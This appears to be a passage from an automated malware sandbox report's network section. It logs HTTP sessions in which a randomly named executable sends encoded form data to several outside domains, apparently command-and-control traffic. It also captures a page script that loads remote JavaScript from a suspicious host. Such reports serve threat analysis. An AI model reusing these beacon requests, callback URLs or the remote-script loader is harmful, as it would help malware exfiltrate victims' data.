                                                                                Dec 14, 2024 13:50:41.363814116 CET1236INData Raw: 28 5e 7c 20 29 22 2b 6e 61 6d 65 2b 22 3d 28 5b 5e 3b 5d 2a 29 28 3b 7c 24 29 22 29 3b 0a 20 20 20 20 20 20 69 66 28 61 72 72 3d 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 2e 6d 61 74 63 68 28 72 65 67 29 29 0a 20 20 20 20 20 20 7b 0a 20 20 20
                                                                                Data Ascii: (^| )"+name+"=([^;]*)(;|$)"); if(arr=document.cookie.match(reg)) { return unescape(arr[2]); } else { return ""; } } function rset_Cookie(name,value) { var hour =
                                                                                Dec 14, 2024 13:50:41.363827944 CET720INData Raw: 4d 48 78 38 64 33 64 33 4c 6d 74 72 63 47 31 76 62 6d 56 35 63 32 39 6a 61 57 46 73 4c 6e 52 76 63 48 78 38 4d 41 3d 3d 27 3b 7d 3b 7d 29 3b 0d 0a 24 2e 67 65 74 53 63 72 69 70 74 28 27 2f 2f 6d 6f 6e 65 79 65 61 73 69 6c 79 73 6e 69 2e 74 6f 70
                                                                                Data Ascii: MHx8d3d3LmtrcG1vbmV5c29jaWFsLnRvcHx8MA==';};});$.getScript('//moneyeasilysni.top/typed.js?1734180641',function(){ if(!rget_Cookie('hasgo')){rset_Cookie('godomain','moneyeasilysni.top');rset_Cookie('area','');rset_Cookie_fast('hasgo','moneyea


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                9192.168.2.549917185.42.14.166806008C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 14, 2024 13:50:47.310389996 CET731OUTPOST /q5xl/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.artkub.net
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 205
                                                                                Connection: close
                                                                                Origin: http://www.artkub.net
                                                                                Referer: http://www.artkub.net/q5xl/
                                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                Data Raw: 4e 56 4b 38 3d 41 56 76 50 6d 63 4a 6b 39 64 73 70 42 79 30 6b 71 6e 4c 70 32 2b 50 4d 34 51 35 44 44 62 7a 6d 68 4c 47 5a 53 55 6f 37 38 73 7a 63 58 67 44 35 44 34 2f 52 42 33 68 68 79 76 59 61 33 53 46 38 56 2f 74 61 66 79 42 47 4c 66 5a 71 43 2b 61 4e 63 75 36 65 43 39 31 65 76 68 65 46 35 4d 79 6b 50 30 43 73 70 68 46 57 4c 48 56 45 70 31 77 46 50 64 47 79 42 56 34 71 6a 32 33 56 6d 6a 68 31 50 46 76 59 36 79 46 32 57 50 78 54 47 74 38 4c 38 57 5a 72 38 32 66 32 75 59 34 39 46 41 62 61 35 49 65 78 47 63 2f 44 65 6d 52 43 2b 55 77 68 76 4b 32 69 70 6d 6d 55 79 65 6a 61 46 66 38 37 49 76 6b 48 53 32 6b 3d
                                                                                Data Ascii: NVK8=AVvPmcJk9dspBy0kqnLp2+PM4Q5DDbzmhLGZSUo78szcXgD5D4/RB3hhyvYa3SF8V/tafyBGLfZqC+aNcu6eC91evheF5MykP0CsphFWLHVEp1wFPdGyBV4qj23Vmjh1PFvY6yF2WPxTGt8L8WZr82f2uY49FAba5IexGc/DemRC+UwhvK2ipmmUyejaFf87IvkHS2k=
                                                                                Dec 14, 2024 13:50:48.615886927 CET711INHTTP/1.1 405 Not Allowed
                                                                                Server: nginx/1.27.3
                                                                                Date: Sat, 14 Dec 2024 12:50:48 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 559
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 37 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e [TRUNCATED]
                                                                                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.27.3</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                10192.168.2.549929185.42.14.166806008C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 14, 2024 13:50:49.967820883 CET751OUTPOST /q5xl/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.artkub.net
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 225
                                                                                Connection: close
                                                                                Origin: http://www.artkub.net
                                                                                Referer: http://www.artkub.net/q5xl/
                                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                Data Raw: 4e 56 4b 38 3d 41 56 76 50 6d 63 4a 6b 39 64 73 70 41 53 45 6b 35 51 2f 70 30 65 50 50 6d 67 35 44 49 37 7a 69 68 4c 61 5a 53 56 64 67 37 5a 6a 63 5a 69 62 35 41 36 58 52 47 33 68 68 39 50 59 56 6f 43 46 6e 56 2f 67 77 66 77 6c 47 4c 66 39 71 43 38 43 4e 63 66 36 5a 44 74 31 63 30 78 65 48 30 73 79 6b 50 30 43 73 70 68 51 42 4c 48 39 45 6f 46 67 46 4f 38 48 41 43 56 35 59 6b 32 33 56 78 7a 68 78 50 46 76 66 36 7a 5a 51 57 4d 4a 54 47 73 4d 4c 79 6e 5a 6f 79 32 65 39 78 6f 35 57 4b 41 47 6c 37 49 53 71 46 75 47 4c 48 41 45 33 79 43 42 4c 31 6f 2b 4b 36 47 4b 73 69 4e 72 74 55 76 64 53 53 4d 30 33 4d 68 78 76 35 4a 44 43 57 6b 54 2b 6c 4d 56 39 38 50 44 73 55 39 2f 4c
                                                                                Data Ascii: NVK8=AVvPmcJk9dspASEk5Q/p0ePPmg5DI7zihLaZSVdg7ZjcZib5A6XRG3hh9PYVoCFnV/gwfwlGLf9qC8CNcf6ZDt1c0xeH0sykP0CsphQBLH9EoFgFO8HACV5Yk23VxzhxPFvf6zZQWMJTGsMLynZoy2e9xo5WKAGl7ISqFuGLHAE3yCBL1o+K6GKsiNrtUvdSSM03Mhxv5JDCWkT+lMV98PDsU9/L
                                                                                Dec 14, 2024 13:50:51.276110888 CET711INHTTP/1.1 405 Not Allowed
                                                                                Server: nginx/1.27.3
                                                                                Date: Sat, 14 Dec 2024 12:50:51 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 559
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 37 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e [TRUNCATED]
                                                                                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.27.3</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                11192.168.2.549935185.42.14.166806008C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 14, 2024 13:50:52.644552946 CET1768OUTPOST /q5xl/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.artkub.net
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 1241
                                                                                Connection: close
                                                                                Origin: http://www.artkub.net
                                                                                Referer: http://www.artkub.net/q5xl/
                                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                Data Raw: 4e 56 4b 38 3d 41 56 76 50 6d 63 4a 6b 39 64 73 70 41 53 45 6b 35 51 2f 70 30 65 50 50 6d 67 35 44 49 37 7a 69 68 4c 61 5a 53 56 64 67 37 5a 72 63 5a 58 48 35 43 62 58 52 48 33 68 68 30 76 59 57 6f 43 45 31 56 37 45 72 66 77 70 57 4c 5a 35 71 51 4a 57 4e 4c 37 6d 5a 4e 74 31 63 72 68 65 47 35 4d 7a 6d 50 30 53 57 70 68 41 42 4c 48 39 45 6f 48 6f 46 48 4e 48 41 45 56 34 71 6a 32 33 4a 6d 6a 68 5a 50 47 66 51 36 7a 64 6d 56 38 70 54 46 50 30 4c 2b 31 78 6f 2b 32 65 2f 79 6f 35 4f 4b 41 4b 45 37 49 4f 75 46 71 4f 68 48 48 77 33 77 6c 64 56 6c 70 44 53 34 45 61 2f 75 63 2f 79 56 76 4a 6b 5a 36 30 4e 42 54 35 42 38 37 62 2f 58 6a 37 45 67 73 63 4e 75 59 2f 59 56 34 79 45 52 55 61 35 66 2b 62 75 51 72 37 4c 44 64 4a 76 78 37 53 59 2b 48 6c 41 77 43 6c 61 35 68 30 6a 48 42 68 42 61 51 59 47 67 68 32 73 64 6a 75 69 4e 4b 55 4c 73 69 73 74 6d 64 44 5a 49 47 4a 45 52 79 64 6f 6c 37 6a 4b 4f 42 4e 64 37 5a 32 2f 4e 48 71 41 43 5a 62 47 67 4d 58 58 38 78 55 46 39 31 76 61 45 46 69 56 2b 64 39 4a 65 38 41 46 6f [TRUNCATED]
                                                                                Data Ascii: NVK8=AVvPmcJk9dspASEk5Q/p0ePPmg5DI7zihLaZSVdg7ZrcZXH5CbXRH3hh0vYWoCE1V7ErfwpWLZ5qQJWNL7mZNt1crheG5MzmP0SWphABLH9EoHoFHNHAEV4qj23JmjhZPGfQ6zdmV8pTFP0L+1xo+2e/yo5OKAKE7IOuFqOhHHw3wldVlpDS4Ea/uc/yVvJkZ60NBT5B87b/Xj7EgscNuY/YV4yERUa5f+buQr7LDdJvx7SY+HlAwCla5h0jHBhBaQYGgh2sdjuiNKULsistmdDZIGJERydol7jKOBNd7Z2/NHqACZbGgMXX8xUF91vaEFiV+d9Je8AFoeglyo7h47IbHH87OpmA04W06eHGPz3GTQNXpMTwOmi8pyP21Xm5p5WTXGF4/AQ8rCuN4SAYV4K9RWlspHygXc3qygFIvpPrynu1TS0B4CScfuVxULmP7qc9o2Uvn/j8sDa73QVAm8nI1wX8577dPjEZfBs52tnb/dD2ig9TQ2b2LqTyt52PdsbHoIEg9brVW1y5urTcJLR9gQJpOvycEuj6dZpVyL6Lw3mAias0RdXH1WoCaAOA6mmFGi2fn5darjhK8vZLV4/eaJltzcj44eoPNIZBVe52quvlDM4mzTdDY7UVi5EKjhg5Jpxv90+E1FCiU5bxE8ml33Dc/hLIVhe0/vPvAUBFQAhygRWSQm/uI0j8ERyPffneNTmbF/ClWxY4MSCim0zGYen/Mhic9Oz5zrPxR5zSIOkJInSMligJFpqw92LH2sVEtjCZVjKq6BSgOHFtH+4qn2CYg6t8OwkYUmrHCwppjyH/okOpAn1HeFw2nhBtCHB+wehgZ6PkI1KlimjRTc9ZFjTouVjKNRVkF9PnmkuXW3DP8lLoxTwl3JLd15dOT8q74e1L/D3t3yrGsT+xMOVUCEo+ws8shSh8h8Hs/xYHAHeaqZBN4WlHP/B/gkJ4UZkYvc8Aolq5I7oOgmLhnd5rpGUwY+BKNGV4IkYn1lW/0W1 [TRUNCATED]
                                                                                Dec 14, 2024 13:50:53.957189083 CET711INHTTP/1.1 405 Not Allowed
                                                                                Server: nginx/1.27.3
                                                                                Date: Sat, 14 Dec 2024 12:50:53 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 559
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 37 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e [TRUNCATED]
                                                                                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.27.3</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                12192.168.2.549942185.42.14.166806008C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 14, 2024 13:50:55.304784060 CET479OUTGET /q5xl/?NVK8=NXHvlplEz+AaHjlx30Dg0ITo3hgweafquKqjP3Y/xf7/cg6iHYjvJgtir9Vs9Xh3XfF5Sx90CNRcQ8yUM+iNQ/JKoQzS5dKBNmaKnzIoSlYQ6FYKM8mOI3dFoEeNlxQJdw==&V6T=lB24KzN0lF-8 HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Host: www.artkub.net
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                Dec 14, 2024 13:50:56.996095896 CET236INHTTP/1.1 200 OK
                                                                                Server: nginx/1.27.3
                                                                                Date: Sat, 14 Dec 2024 12:50:56 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 31542
                                                                                Last-Modified: Wed, 11 Dec 2024 10:35:31 GMT
                                                                                Connection: close
                                                                                ETag: "67596af3-7b36"
                                                                                Accept-Ranges: bytes
                                                                                Dec 14, 2024 13:50:56.996113062 CET1236INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 72 75 22 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20
                                                                                Data Ascii: <!DOCTYPE html><html lang="ru"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=0"/> <meta http-equiv="Cache-Control" content="n
                                                                                Dec 14, 2024 13:50:56.996841908 CET1236INData Raw: 20 64 61 74 61 2d 70 61 74 68 3d 22 62 75 72 67 65 72 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 2e 2f 69 6d 67 2f d0 93 d0 b0 d0 bc d0 b1 d1 83 d1 80 d0 b3 d0 b5 d1 80 2e 73 76 67 22 20 61 6c 74 3d 22 22 3e 0d
                                                                                Data Ascii: data-path="burger"> <img src="./img/.svg" alt=""> </div> </header> <main> <div class="mainBlock"> <div class="maintext"> <div class="mainTitle">
                                                                                Dec 14, 2024 13:50:56.996860981 CET1236INData Raw: 73 73 3d 22 6d 61 69 6e 50 6c 75 73 65 73 2d 69 63 6f 6e 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 2e 2f 69 6d 67 2f 6d 61 69 6e 50 6c 75 73 65 73 2e 73 76 67 22
                                                                                Data Ascii: ss="mainPluses-icon"> <img src="./img/mainPluses.svg" alt=""> </div> <div class="mainPluses-txt">
                                                                                Dec 14, 2024 13:50:56.996872902 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 d0 ba d0 b5 d0 b9 d1 82 d0 b5 d1 80 d0 b8 d0 bd d0 b3 2d d1 81 d0 be d0 bf d1 80 d0 be d0 b2 d0 be d0 b6 d0 b4 d0 b5 d0 bd d0 b8 d0 b5 2c 20 d0 b0 20 d1 82 d0 b0 d0 ba d0 b6 d0 b5 20 d0 bf d0 be d0 bb d1 83
                                                                                Data Ascii: -, , ,
                                                                                Dec 14, 2024 13:50:56.996879101 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 2e 2f 69 6d 67 2f 45 6c 6c 69 70 73 65 20 31 39 2e 73 76 67 22 20 61 6c 74 3d 22 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                Data Ascii: <img src="./img/Ellipse 19.svg" alt=""> </div> <div class="circle-txt">5</div> </div> <p> <
                                                                                Dec 14, 2024 13:50:56.996890068 CET1236INData Raw: 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6c 6f 63 6b 44 69 72 65 63 74 69 6f 6e 22 3e 0d 0a 20 20 20 20 20 20
                                                                                Data Ascii: </div> </div> <div class="blockDirection"> <div class="title"></div> <div class="directions"> <div class="directions-item"> <
                                                                                Dec 14, 2024 13:50:56.996901989 CET1236INData Raw: d0 bb d0 be d0 b2 d1 8b d0 b5 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20
                                                                                Data Ascii: </p> </div> <div class="directions-item-block-buttonMore buttonOpenModal" data-path="stolovka"><p></p></div> </div
                                                                                Dec 14, 2024 13:50:56.996958017 CET1236INData Raw: 6f 63 6b 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 69 72 65 63 74 69 6f 6e 73 2d 69 74 65 6d 2d 62 6c 6f 63 6b 2d 74 78 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20
                                                                                Data Ascii: ock"> <div class="directions-item-block-txt"> <p> <br>
                                                                                Dec 14, 2024 13:50:56.996972084 CET1236INData Raw: 69 6f 6e 73 2d 69 74 65 6d 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 4d 6f 72 65 20 62 75 74 74 6f 6e 4f 70 65 6e 4d 6f 64 61 6c 22 20 64 61 74 61 2d 70 61 74 68 3d 22 66 65 72 6d 61 22 3e 3c 70 3e d0 bf d0 be d0 b4 d1 80 d0 be d0 b1 d0 bd d0 b5 d0
                                                                                Data Ascii: ions-item-block-buttonMore buttonOpenModal" data-path="ferma"><p></p></div> </div> </div> </div> </div> <div class="blockPlases"> <div class="t
                                                                                Dec 14, 2024 13:50:56.998611927 CET1236INData Raw: 75 73 2d 69 74 65 6d 2d 69 63 6f 6e 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 2e 2f 69 6d 67 2f d0 a0 d0 b0 d0 b7 d0 b2 d0 b8 d1 82 d0 b8 d0 b5 2e 73 76 67 22 20
                                                                                Data Ascii: us-item-icon"> <img src="./img/.svg" alt=""> </div> <div class="plus-item-textBox icontextbox2"> <div class="textBox-ti


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                13192.168.2.549959209.74.77.107806008C:\Program Files (x86)\utEIaNjzzRWRxgSZusiCDYAgIzRFVzdQFdLMTManTacysXSKCjRzmIS\ZaZCnGdXtY.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 14, 2024 13:51:03.091006041 CET740OUTPOST /4t49/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.happyjam.life
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 205
                                                                                Connection: close
                                                                                Origin: http://www.happyjam.life
                                                                                Referer: http://www.happyjam.life/4t49/
                                                                                User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
                                                                                Data Raw: 4e 56 4b 38 3d 6e 51 38 30 78 47 64 33 32 38 6d 78 68 59 57 64 59 39 47 48 4b 6b 6e 4d 35 6d 5a 74 74 39 34 61 79 2b 5a 49 4b 68 64 44 71 37 56 6b 49 49 4e 71 49 41 59 61 38 64 48 59 76 2f 75 46 37 56 4a 68 30 32 68 5a 57 7a 78 35 75 33 5a 53 35 71 33 5a 58 2f 48 66 35 46 42 55 75 47 49 41 54 47 57 7a 74 59 4f 63 4c 42 62 4e 54 4b 74 31 78 57 35 63 4a 71 71 67 45 4b 49 4c 62 6f 32 4f 79 49 37 46 42 6e 72 42 36 45 45 50 47 51 69 4b 30 6c 65 5a 66 44 48 68 44 4d 59 6a 57 4c 41 47 65 41 63 2f 30 42 2f 74 4d 4f 7a 4b 36 64 6f 31 65 61 65 65 61 48 49 6f 2f 67 4f 32 56 48 52 72 38 79 44 62 77 58 76 72 78 68 6b 3d
                                                                                Data Ascii: NVK8=nQ80xGd328mxhYWdY9GHKknM5mZtt94ay+ZIKhdDq7VkIINqIAYa8dHYv/uF7VJh02hZWzx5u3ZS5q3ZX/Hf5FBUuGIATGWztYOcLBbNTKt1xW5cJqqgEKILbo2OyI7FBnrB6EEPGQiK0leZfDHhDMYjWLAGeAc/0B/tMOzK6do1eaeeaHIo/gO2VHRr8yDbwXvrxhk=
                                                                                Dec 14, 2024 13:51:04.314090967 CET533INHTTP/1.1 404 Not Found
                                                                                Date: Sat, 14 Dec 2024 12:51:04 GMT
                                                                                Server: Apache
                                                                                Content-Length: 389
                                                                                Connection: close
                                                                                Content-Type: text/html
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
